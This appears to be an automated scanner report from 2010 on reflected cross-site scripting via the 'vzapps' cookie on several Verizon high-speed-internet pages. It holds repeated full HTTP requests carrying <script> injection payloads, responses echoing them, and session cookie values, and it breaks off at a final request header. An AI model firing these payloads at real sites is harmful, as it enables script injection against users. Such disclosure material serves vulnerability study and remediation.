The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>ece11e87003 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXcdf59'><script>alert(1)</script>ece11e87003; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64487 Expires: Sat, 20 Nov 2010 00:09:15 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:15 GMT Connection: close Set-Cookie: ContextInfo_State=TXcdf59'><script>alert(1)</script>ece11e87003; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet | Check Availability </title><meta name="keywords" content="how to get verizon high speed internet, order verizon high ...[SNIP]... <input type='hidden' id='locationInfo' value='TXCDF59'><SCRIPT>ALERT(1)</SCRIPT>ECE11E87003 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 85766<script>alert(1)</script>8553ba7b684 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX85766<script>alert(1)</script>8553ba7b684; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92738 Expires: Sat, 20 Nov 2010 00:12:22 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:22 GMT Connection: close Set-Cookie: ContextInfo_State=TX85766<script>alert(1)</script>8553ba7b684; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX85766<SCRIPT>ALERT(1)</SCRIPT>8553BA7B684 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5b24'><script>alert(1)</script>d2df3510f80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc5b24'><script>alert(1)</script>d2df3510f80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92742 Expires: Sat, 20 Nov 2010 00:12:19 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:19 GMT Connection: close Set-Cookie: ContextInfo_State=TXc5b24'><script>alert(1)</script>d2df3510f80; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <input type='hidden' id='locationInfo' value='TXC5B24'><SCRIPT>ALERT(1)</SCRIPT>D2DF3510F80 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1327c'><script>alert(1)</script>eb0b45a8082 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX1327c'><script>alert(1)</script>eb0b45a8082; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68022 Expires: Sat, 20 Nov 2010 00:11:52 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:52 GMT Connection: close Set-Cookie: ContextInfo_State=TX1327c'><script>alert(1)</script>eb0b45a8082; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload d477a<script>alert(1)</script>4e4f8e6dbe8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXd477a<script>alert(1)</script>4e4f8e6dbe8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68018 Expires: Sat, 20 Nov 2010 00:12:31 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:31 GMT Connection: close Set-Cookie: ContextInfo_State=TXd477a<script>alert(1)</script>4e4f8e6dbe8; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 98e16<script>alert(1)</script>9d0879de158 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX98e16<script>alert(1)</script>9d0879de158; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68015 Expires: Sat, 20 Nov 2010 00:09:38 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:38 GMT Connection: close Set-Cookie: ContextInfo_State=TX98e16<script>alert(1)</script>9d0879de158; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0257'><script>alert(1)</script>be1613d7d65 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc0257'><script>alert(1)</script>be1613d7d65; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68019 Expires: Sat, 20 Nov 2010 00:09:22 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:22 GMT Connection: close Set-Cookie: ContextInfo_State=TXc0257'><script>alert(1)</script>be1613d7d65; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0ce9'><script>alert(1)</script>6ae6011d9f2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 58000 Expires: Sat, 20 Nov 2010 00:09:16 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:16 GMT Connection: close Set-Cookie: ContextInfo_State=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1afe5<script>alert(1)</script>103649a90a9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX1afe5<script>alert(1)</script>103649a90a9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 57996 Expires: Sat, 20 Nov 2010 00:09:18 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:18 GMT Connection: close Set-Cookie: ContextInfo_State=TX1afe5<script>alert(1)</script>103649a90a9; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 134f1'><script>alert(1)</script>ef0109a6fac was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX134f1'><script>alert(1)</script>ef0109a6fac; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 94442 Expires: Sat, 20 Nov 2010 00:13:32 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:32 GMT Connection: close Set-Cookie: ContextInfo_State=TX134f1'><script>alert(1)</script>ef0109a6fac; path=/ Set-Cookie: ContextInfo_Language=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Plans </title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v ...[SNIP]... <input type='hidden' id='locationInfo' value='TX134F1'><SCRIPT>ALERT(1)</SCRIPT>EF0109A6FAC ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 50211<script>alert(1)</script>b0f40fbc4a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX50211<script>alert(1)</script>b0f40fbc4a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92840 Expires: Sat, 20 Nov 2010 00:13:42 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:42 GMT Connection: close Set-Cookie: ContextInfo_State=TX50211<script>alert(1)</script>b0f40fbc4a; path=/ Set-Cookie: ContextInfo_Language=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Plans </title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX50211<SCRIPT>ALERT(1)</SCRIPT>B0F40FBC4A </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9fca0<script>alert(1)</script>ac910a19ffb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9fca0<script>alert(1)</script>ac910a19ffb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74933 Expires: Sat, 20 Nov 2010 00:13:31 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:31 GMT Connection: close Set-Cookie: ContextInfo_State=TX9fca0<script>alert(1)</script>ac910a19ffb; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: About High Speed Internet </title><meta name="Keywords" description="reliability, low price, free content, free email ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX9FCA0<SCRIPT>ALERT(1)</SCRIPT>AC910A19FFB </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af68f'><script>alert(1)</script>63ed67becf9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXaf68f'><script>alert(1)</script>63ed67becf9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74936 Expires: Sat, 20 Nov 2010 00:13:03 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:03 GMT Connection: close Set-Cookie: ContextInfo_State=TXaf68f'><script>alert(1)</script>63ed67becf9; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: About High Speed Internet </title><meta name="Keywords" description="reliability, low price, free content, free email ...[SNIP]... <input type='hidden' id='locationInfo' value='TXAF68F'><SCRIPT>ALERT(1)</SCRIPT>63ED67BECF9 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8b391<script>alert(1)</script>ee2a020046a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8b391<script>alert(1)</script>ee2a020046a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 104004 Expires: Sat, 20 Nov 2010 00:10:14 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:14 GMT Connection: close Set-Cookie: ContextInfo_State=TX8b391<script>alert(1)</script>ee2a020046a; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: FAQs </title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX8B391<SCRIPT>ALERT(1)</SCRIPT>EE2A020046A </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4dbaa'><script>alert(1)</script>f9ec6948bd6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
